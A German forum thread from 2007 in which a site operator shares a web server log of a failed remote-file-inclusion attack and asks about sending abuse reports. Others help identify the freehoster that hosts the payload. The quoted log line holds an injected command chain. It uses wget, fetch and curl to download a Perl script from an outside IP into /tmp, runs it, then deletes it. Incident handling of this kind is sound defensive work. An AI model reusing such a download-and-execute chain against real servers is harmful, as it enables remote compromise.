Angriff auf Server

Mordor

Registered User
Mahlzeit allerseits!
Das man hin und wieder mal in den Logfiles komische Sachen finde ist ja normal. Ich hatte Gestern Mittag aber über 800 Http Anfragen mit voranngehenden mehrfachen Portscanns.
Für mich sieht das aus wie Crosssidescriptingversuche:

Code:
64.40.110.192 - - [22/Mar/2007:13:24:24 +0100] "GET /window.php?action=http://smurf.deep-ice.com/kid.gif?&cmd=wget%20-P%20/tmp%20http://193.94.169.61/WebCalendar/tools/a.pl;perl%20/tmp/a.pl;fetch%20-o%20/var/tmp%20http://193.94.169.61/WebCalendar/tools/a.pl;perl%20/tmp/a.pl;curl%20-o%20/tmp/a.pl%20-O%20http://193.94.169.61/WebCalendar/tools/a.pl;perl%20/tmp/a.pl;rm%20-rf%20/tmp/a.pl;echo/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Das ist zum Beispiel eine davon.

Sonst konnte ich nichts in den Logs finden. Auch die Seite läuft einwandfrei. Anscheinend ist der Angriff nicht ganz geglückt.

die Hauptfrage die sich mir stellt ist, ab wann kann man bedenkenlos eine Abuse-Mail schreiben, ohne dass man sich lächerlich macht. Sind 600 bis 800 Anfragen dieser Art schon gerechtvertigt?

Gruß Mordor
 
ich denk mal dies ist hier ein skript kiddie, sowas hatte ich auch mal! das wars doch oder?
 
Vielleicht ist der Thread noch von Interesse :)
 
Sorgen mach ich mir da nicht, denn wie gesagt, es gab ja nur 404s.

@v40
Wie bist du an das Formular gekommen?
Ich hab zwar schon ne whois Abfrage über DNSstuff laufen lassen, und da bin ich nur an die aubse E-mailadresse des Providers gekommen.

Gruß Mordor
 
Hallo,

Code:
....http://smurf.deep-ice.com.....

Das ist eine Subdomain eines Feehosters.
Ruf einfach mal deep-ice.com auf, da findest du dann oben Rechts die Kontaktmöglichkeiten.
 
Super, ich sag mal danke.
Werd mich dann mal dran machen, mein abuse zu schreiben.

Gruß Mordor
 
So, mir ist grad aufgefallen, dass der Feehoster und der Server von dem die Anfragen kamen unterschiedliche IPs hatten. zumindest sagt das whois Abfrage. Werd mal beiden ein Abuse schreiben.
Bin mal gespannt was da zurück kommt.
 
Hallo,

deswegen schrieb ich ja auch das du an den wo das schädliche Script sich befindet eine Abuse Mail schreiben solltest.

Das der Angriffs-Versuch von anderer Seite kam (DSL Anschluss) ist eigentlich klar.

Bei dem Freehoster liegt nur das Script das versucht wurde auf deinen Server zu laden.
 
Wie gesagt, ich bin ja mal gespannt was da kommt.
Wenn man das Formular vom Freehoster abschickt kriegt man ne Bestätigung, dass die sich in 24 Stunden spätestens mit einem in Verbindung setzen.
Bin mal gespannt ob das auch am Sonntag klappt.
 
Back
Top